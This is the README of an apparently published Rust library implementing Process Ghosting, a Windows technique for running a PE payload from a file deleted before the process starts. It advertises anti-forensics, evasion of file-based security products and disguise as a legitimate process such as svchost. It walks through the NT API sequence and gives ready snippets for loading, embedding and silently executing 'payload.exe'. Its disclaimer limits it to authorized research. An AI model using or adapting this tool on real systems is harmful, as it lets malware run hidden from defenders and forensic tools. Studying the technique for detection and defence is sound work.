# ProcessGhosting π»
[](https://crates.io/crates/ProcessGhosting)
[](https://docs.rs/ProcessGhosting)
[](https://opensource.org/licenses/MIT)
[](https://github.com/BlackTechX011/ProcessGhosting/actions)
[](https://crates.io/crates/ProcessGhosting)
[](https://github.com/BlackTechX011/ProcessGhosting)
> **A Rust implementation of the Process Ghosting technique by BlackTechX**
Process Ghosting is an advanced code execution technique that allows running executable code without leaving traces on the filesystem. This library provides a safe, easy-to-use Rust API for implementing this technique.
---
## π Table of Contents
- [What is Process Ghosting?](#-what-is-process-ghosting)
- [How It Works](#-how-it-works)
- [Technical Deep Dive](#-technical-deep-dive)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [API Reference](#-api-reference)
- [Examples](#-examples)
- [Hex Utilities](#-hex-utilities)
- [Architecture Support](#-architecture-support)
- [Building](#-building)
- [Security Considerations](#-security-considerations)
- [Credits](#-credits)
- [License](#-license)
---
## π» What is Process Ghosting?
Process Ghosting is a technique discovered by Gabriel Landau at Elastic Security. It exploits the Windows file system and process creation mechanisms to execute code from a file that no longer exists on disk.
### Key Features
| π **Fileless Execution** | Payload file is deleted before process starts |
| π΅οΈ **Anti-Forensics** | No file remains on disk for security tools to scan |
| π‘οΈ **Evasion** | Bypasses many file-based security products |
| π€ **Stealth** | Process appears to run from a legitimate path |
| π¦ **Pure Rust** | Safe, fast, and memory-efficient implementation |
| π¦ **Easy API** | Simple builder pattern for configuration |
---
## π¬ How It Works
Process Ghosting exploits the Windows NT kernel's handling of delete-pending files:
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β PROCESS GHOSTING FLOW β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββ
β START β
ββββββββ¬ββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 1. Create temp file β
βββββββββββββ¬ββββββββββββ
β
βΌ
ββββββββββββββββββββββββββ
β 2. Set delete-pending β
β (NtSetInformationFile) β
βββββββββββββ¬βββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 3. Write PE payload β
β to the file β
βββββββββββββ¬ββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 4. Create SEC_IMAGE β
β section from file β
βββββββββββββ¬ββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 5. Close file handle β
β β οΈ FILE DELETED! β οΈ β
βββββββββββββ¬ββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 6. Create process β
β from the section β
βββββββββββββ¬ββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 7. Setup PEB and β
β process parameters β
βββββββββββββ¬ββββββββββββ
β
βΌ
βββββββββββββββββββββββββ
β 8. Create thread at β
β entry point β
βββββββββββββ¬ββββββββββββ
β
βΌ
RUNNING
(No file! π»)
```
### The Magic Explained
1. **Delete-Pending State**: When a file is marked for deletion but still has an open handle, it enters a "delete-pending" state
2. **Section Creation**: Windows allows creating an image section from a delete-pending file
3. **File Deletion**: Once we close the file handle, the file is deleted from disk
4. **Process Creation**: The section (now without a backing file) can still be used to create a process
---
## π§ Technical Deep Dive
### NT API Functions Used
| `NtOpenFile` | Open temp file with DELETE permission |
| `NtSetInformationFile` | Mark file as delete-pending |
| `NtCreateSection` | Create SEC_IMAGE section |
| `NtCreateProcessEx` | Create process from section |
| `NtQueryInformationProcess` | Get PEB address |
| `RtlCreateProcessParametersEx` | Create process parameters |
| `NtAllocateVirtualMemory` | Allocate memory in target |
| `NtWriteVirtualMemory` | Write parameters to target |
| `NtCreateThreadEx` | Start execution |
| `RtlImageNtHeader` | Parse PE headers |
### Memory Layout
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββ
β TARGET PROCESS MEMORY β
βββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ β
β β MAPPED PE IMAGE β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ€ β
β β DOS Header (MZ) β β
β β NT Headers β β
β β ββ OptionalHeader.AddressOfEntryPoint βββββΌββΌβββΊ Entry Point
β β Section Headers β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ€ β
β β .text (Code) βββ Execution starts β β
β β .rdata (Read-only data) β β
β β .data (Initialized data) β β
β β .rsrc (Resources) β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ β
β β PEB β β
β β ββ ImageBaseAddress β β
β β β
β βββββββββββββββββββββββββββββββββββββΌβββββββββββ β
β β RTL_USER_PROCESS_PARAMETERS β β
β β ImagePathName: C:\Windows\System32\svchost β β
β β CommandLine: svchost.exe β β
β β Environment: ... β β
β ββββββββββββββββββββββββββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
### Comparison with Other Techniques
| **Process Ghosting** | β No | β No | βββ |
| Process Hollowing | β
Yes (legitimate) | β οΈ Maybe | ββ |
| Process DoppelgΓ€nging | β No | β No | ββββ |
| DLL Injection | β
Yes | β
Yes | ββ |
| Reflective Loading | β No | β οΈ Memory scan | βββ |
---
## π¦ Installation
Add to your `Cargo.toml`:
```toml
[dependencies]
ProcessGhosting = "0.1"
```
Or using cargo:
```bash
cargo add ProcessGhosting
```
---
## π Quick Start
### Method 1: From File
```rust
use process_ghosting::{GhostingBuilder, init};
fn main() -> Result<(), String> {
init(); // Print banner
GhostingBuilder::from_file("payload.exe")?
.x64()
.with_logging()
.execute()
}
```
### Method 2: From Bytes
```rust
use process_ghosting::GhostingBuilder;
fn main() -> Result<(), String> {
let payload = std::fs::read("payload.exe").unwrap();
GhostingBuilder::new(&payload)
.x64()
.execute()
}
```
### Method 3: From Hex String
```rust
use process_ghosting::GhostingBuilder;
fn main() -> Result<(), String> {
let hex = "0x4D, 0x5A, 0x90, ..."; // Your payload
GhostingBuilder::from_hex_string(hex)?
.x64()
.execute()
}
```
### Method 4: Embedded at Compile Time
```rust
use process_ghosting::GhostingBuilder;
const PAYLOAD: &[u8] = include_bytes!("../payload.exe");
fn main() -> Result<(), String> {
GhostingBuilder::new(PAYLOAD)
.x64()
.silent()
.execute()
}
```
### Method 5: Quick Functions
```rust
use process_ghosting::{ghost_payload_file, ghost_payload};
fn main() -> Result<(), String> {
// From file
ghost_payload_file("payload.exe")?;
// From bytes
let bytes = std::fs::read("payload.exe").unwrap();
ghost_payload(&bytes)
}
```
---
## π API Reference
### GhostingBuilder
Main builder for configuring process ghosting operations.
```rust
// Creation methods
GhostingBuilder::new(payload: &[u8]) -> Self
GhostingBuilder::from_file(path: &str) -> Result<Self, String>
GhostingBuilder::from_hex_string(hex: &str) -> Result<Self, String>
GhostingBuilder::from_hex_array(bytes: &[u8]) -> Self
// Configuration methods
.x64() -> Self // Target x64 (default)
.x86() -> Self // Target x86
.architecture(arch: Architecture) -> Self // Set architecture
.with_logging() -> Self // Enable verbose output
.silent() -> Self // Disable all output
.verbose(bool) -> Self // Set verbosity
// Execution
.build() -> GhostingConfig // Get configuration
.execute() -> Result<(), String> // Execute ghosting
```
### Quick Functions
```rust
// Execute with defaults (x64, verbose)
ghost_payload(payload: &[u8]) -> Result<(), String>
// Execute from file
ghost_payload_file(path: &str) -> Result<(), String>
// Execute from hex string
ghost_payload_hex(hex: &str) -> Result<(), String>
// Execute with architecture
ghost_payload_arch(payload: &[u8], arch: Architecture) -> Result<(), String>
```
### Architecture Enum
```rust
pub enum Architecture {
X86, // 32-bit
X64, // 64-bit (default)
}
```
---
## π’ Hex Utilities
### Convert EXE to Hex
```rust
use process_ghosting::{exe_to_hex_string, print_exe_hex};
// Get as string: "0x4D, 0x5A, 0x90, ..."
let hex = exe_to_hex_string("payload.exe")?;
// Print formatted for Rust code
print_exe_hex("payload.exe")?;
// Output:
// const PAYLOAD: &[u8] = &[
// 0x4D, 0x5A, 0x90, 0x00, ...
// ];
```
### Parse Hex Strings
All formats supported:
```rust
use process_ghosting::parse_hex_string;
// Continuous
parse_hex_string("4D5A9000")?;
// Space-separated
parse_hex_string("4D 5A 90 00")?;
// C-style
parse_hex_string("0x4D, 0x5A, 0x90, 0x00")?;
// Escaped
parse_hex_string("\\x4D\\x5A\\x90\\x00")?;
```
### Utility Functions
```rust
// Read file as bytes
read_exe_bytes(path: &str) -> Result<Vec<u8>, String>
// Convert bytes to hex string
bytes_to_hex_string(bytes: &[u8]) -> String
// Convert file to formatted array
exe_to_hex_array(path: &str) -> Result<String, String>
```
---
## π Examples
### Run Examples
```bash
# Basic usage
cargo run --example basic_usage
# From file with path argument
cargo run --example from_file -- payload.exe
# Convert EXE to hex
cargo run --example hex_converter -- print notepad.exe
# Full demo
cargo run --example full_demo
```
### Example: Basic Usage
```rust
use process_ghosting::{GhostingBuilder, init};
fn main() {
init();
match GhostingBuilder::from_file("payload.exe") {
Ok(builder) => {
match builder.x64().with_logging().execute() {
Ok(_) => println!("[+] Success!"),
Err(e) => println!("[-] Failed: {}", e),
}
}
Err(e) => println!("[-] Load error: {}", e),
}
}
```
### Example: Silent Execution
```rust
use process_ghosting::GhostingBuilder;
fn main() {
let payload = std::fs::read("payload.exe").unwrap();
let _ = GhostingBuilder::new(&payload)
.x64()
.silent()
.execute();
}
```
### Example: Error Handling
```rust
use process_ghosting::GhostingBuilder;
fn main() {
let result = GhostingBuilder::from_file("payload.exe")
.and_then(|b| b.x64().execute());
match result {
Ok(_) => std::process::exit(0),
Err(e) => {
eprintln!("Error: {}", e);
std::process::exit(1);
}
}
}
```
---
## ποΈ Architecture Support
| x64 (AMD64) | β
Supported | `.x64()` (default) |
| x86 (i386) | β
Supported | `.x86()` |
| ARM64 | β Not yet | - |
---
## π¨ Building
```bash
# Debug build
cargo build
# Release build
cargo build --release
# Build for 32-bit
cargo build --release --target i686-pc-windows-msvc
# Build for 64-bit
cargo build --release --target x86_64-pc-windows-msvc
# Run tests
cargo test
# Build docs
cargo doc --open
```
---
## β οΈ Security Considerations
### Intended Use Cases
- β
Security research
- β
Red team operations
- β
Penetration testing (authorized)
- β
Malware analysis
- β
Educational purposes
### Prohibited Uses
- β Unauthorized system access
- β Malware deployment
- β Any illegal activities
### Legal Disclaimer
This software is provided for educational and authorized security research purposes only. The author is not responsible for any misuse. Users must ensure compliance with all applicable laws.
---
## π Credits
- **Gabriel Landau** (Elastic Security) - Original Process Ghosting research.
- **Offensive Panda** (Github: @offensive-panda) - Process Ghosting in c.
- **BlackTechX** - Rust implementation
---
## π License
MIT License - See [LICENSE](LICENSE) file.
---
## π Links
- [Crates.io](https://crates.io/crates/ProcessGhosting)
- [Documentation](https://docs.rs/ProcessGhosting)
- [GitHub Repository](https://github.com/BlackTechX011/ProcessGhosting)
- [Original Research](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack)
---
<p align="center">
<b>Made with π» by BlackTechX</b>
</p>